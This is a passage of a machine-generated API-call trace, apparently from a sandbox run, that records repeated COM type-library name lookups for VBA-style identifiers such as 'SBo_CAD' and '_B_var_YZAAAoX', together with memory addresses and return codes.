lHashVal=0x103624, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.206] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.206] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.206] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="SBo_CAD", lHashVal=0x103624, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.206] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bfe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SBo_CAD") returned 8 [0069.206] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="SBo_CAD", lHashVal=0x103624, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.207] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.207] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62bfe | out: _Dst=0x67c2d40) returned 0x0 [0069.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_SBo_CAD") returned 0x1039a8 [0069.207] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_SBo_CAD" | out: _Dst="_B_var_SBo_CAD") returned 0x0 [0069.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_SBo_CAD") returned 15 [0069.207] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.207] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_SBo_CAD", lHashVal=0x1039a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.207] IUnknown:Release (This=0x665ba50) returned 0xd [0069.207] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.207] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_SBo_CAD", lHashVal=0x1039a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.207] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.207] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.207] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_SBo_CAD", lHashVal=0x1039a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.207] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.207] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.207] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_SBo_CAD", lHashVal=0x1039a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.207] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.207] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.207] IUnknown:Release (This=0x665ba50) returned 0xd [0069.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11a2e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_SBo_CAD") returned 15 [0069.207] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_SBo_CAD", lHashVal=0x1039a8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x43005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x43005f00000000, pDummy=0x0) returned 0x0 [0069.207] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62bfe | out: _Dst=0x144ec0) returned 0x0 [0069.207] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YZAAAoX", lHashVal=0x109943, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YZAAAoX") returned 8 [0069.208] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YZAAAoX", lHashVal=0x109943, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YZAAAoX") returned 8 [0069.208] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YZAAAoX", lHashVal=0x109943, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YZAAAoX") returned 0x109943 [0069.208] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="YZAAAoX" | out: _Dst="YZAAAoX") returned 0x0 [0069.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="YZAAAoX") returned 8 [0069.208] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.208] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YZAAAoX", lHashVal=0x109943, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.208] IUnknown:Release (This=0x665ba50) returned 0xd [0069.208] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.208] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YZAAAoX", lHashVal=0x109943, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.208] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.208] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.208] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YZAAAoX", lHashVal=0x109943, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.208] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.208] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.208] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YZAAAoX", lHashVal=0x109943, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.208] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YZAAAoX") returned 8 [0069.208] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YZAAAoX", lHashVal=0x109943, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.208] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.208] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62bd6 | out: _Dst=0x67c2d40) returned 0x0 [0069.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YZAAAoX") returned 0x109cc7 [0069.208] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_YZAAAoX" | out: _Dst="_B_var_YZAAAoX") returned 0x0 [0069.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_YZAAAoX") returned 15 [0069.209] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.209] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YZAAAoX", lHashVal=0x109cc7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.209] IUnknown:Release (This=0x665ba50) returned 0xd [0069.209] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.209] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YZAAAoX", lHashVal=0x109cc7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.209] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.209] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.209] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YZAAAoX", lHashVal=0x109cc7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.209] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.209] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.209] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YZAAAoX", lHashVal=0x109cc7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.209] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.209] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.209] IUnknown:Release (This=0x665ba50) returned 0xd [0069.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11a5e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_YZAAAoX") returned 15 [0069.209] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YZAAAoX", lHashVal=0x109cc7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.209] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62bd6 | out: _Dst=0x144ec0) returned 0x0 [0069.209] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kQAADoA", lHashVal=0x106eea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c4e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kQAADoA") returned 8 [0069.209] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kQAADoA", lHashVal=0x106eea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c4e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kQAADoA") returned 8 [0069.209] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kQAADoA", lHashVal=0x106eea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kQAADoA") returned 0x106eea [0069.210] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="kQAADoA" | out: _Dst="kQAADoA") returned 0x0 [0069.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="kQAADoA") returned 8 [0069.210] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.210] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kQAADoA", lHashVal=0x106eea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.210] IUnknown:Release (This=0x665ba50) returned 0xd [0069.210] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.210] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kQAADoA", lHashVal=0x106eea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.210] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.210] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.210] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kQAADoA", lHashVal=0x106eea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.210] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.210] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.210] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kQAADoA", lHashVal=0x106eea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.210] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c4e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kQAADoA") returned 8 [0069.210] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kQAADoA", lHashVal=0x106eea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.210] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.210] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62c4e | out: _Dst=0x67c2d40) returned 0x0 [0069.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kQAADoA") returned 0x10726e [0069.210] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_kQAADoA" | out: _Dst="_B_var_kQAADoA") returned 0x0 [0069.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_kQAADoA") returned 15 [0069.210] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.210] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kQAADoA", lHashVal=0x10726e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.210] IUnknown:Release (This=0x665ba50) returned 0xd [0069.210] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.210] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kQAADoA", lHashVal=0x10726e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.210] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.210] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.211] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kQAADoA", lHashVal=0x10726e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.211] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.211] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.211] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kQAADoA", lHashVal=0x10726e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.211] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.211] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.211] IUnknown:Release (This=0x665ba50) returned 0xd [0069.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11a8e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_kQAADoA") returned 15 [0069.211] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kQAADoA", lHashVal=0x10726e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.211] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62c4e | out: _Dst=0x144ec0) returned 0x0 [0069.211] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wAA4UADA", lHashVal=0x107ca9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c76, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wAA4UADA") returned 9 [0069.211] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wAA4UADA", lHashVal=0x107ca9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c76, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wAA4UADA") returned 9 [0069.211] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wAA4UADA", lHashVal=0x107ca9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAA4UADA") returned 0x107ca9 [0069.211] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wAA4UADA" | out: _Dst="wAA4UADA") returned 0x0 [0069.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wAA4UADA") returned 9 [0069.211] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.211] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wAA4UADA", lHashVal=0x107ca9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.211] IUnknown:Release (This=0x665ba50) returned 0xd [0069.211] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.211] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wAA4UADA", lHashVal=0x107ca9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.212] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.212] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.212] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wAA4UADA", lHashVal=0x107ca9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.212] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.212] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.212] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wAA4UADA", lHashVal=0x107ca9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.212] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c76, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wAA4UADA") returned 9 [0069.212] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wAA4UADA", lHashVal=0x107ca9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.212] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.212] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62c76 | out: _Dst=0x67c2d40) returned 0x0 [0069.212] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wAA4UADA") returned 0x105432 [0069.212] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wAA4UADA" | out: _Dst="_B_var_wAA4UADA") returned 0x0 [0069.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wAA4UADA") returned 16 [0069.212] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.212] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wAA4UADA", lHashVal=0x105432, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.212] IUnknown:Release (This=0x665ba50) returned 0xd [0069.212] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.212] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wAA4UADA", lHashVal=0x105432, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.212] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.212] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.212] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wAA4UADA", lHashVal=0x105432, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.212] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.212] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.212] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wAA4UADA", lHashVal=0x105432, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.212] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.212] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.212] IUnknown:Release (This=0x665ba50) returned 0xd [0069.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11abe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wAA4UADA") returned 16 [0069.212] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wAA4UADA", lHashVal=0x105432, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x55003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x55003400000000, pDummy=0x0) returned 0x0 [0069.213] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62c76 | out: _Dst=0x144ec0) returned 0x0 [0069.213] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XAAAACZQ", lHashVal=0x108346, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ca2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="XAAAACZQ") returned 9 [0069.213] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XAAAACZQ", lHashVal=0x108346, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ca2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="XAAAACZQ") returned 9 [0069.213] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XAAAACZQ", lHashVal=0x108346, wFlags=0x3, ppTInfo=0x144cf8, 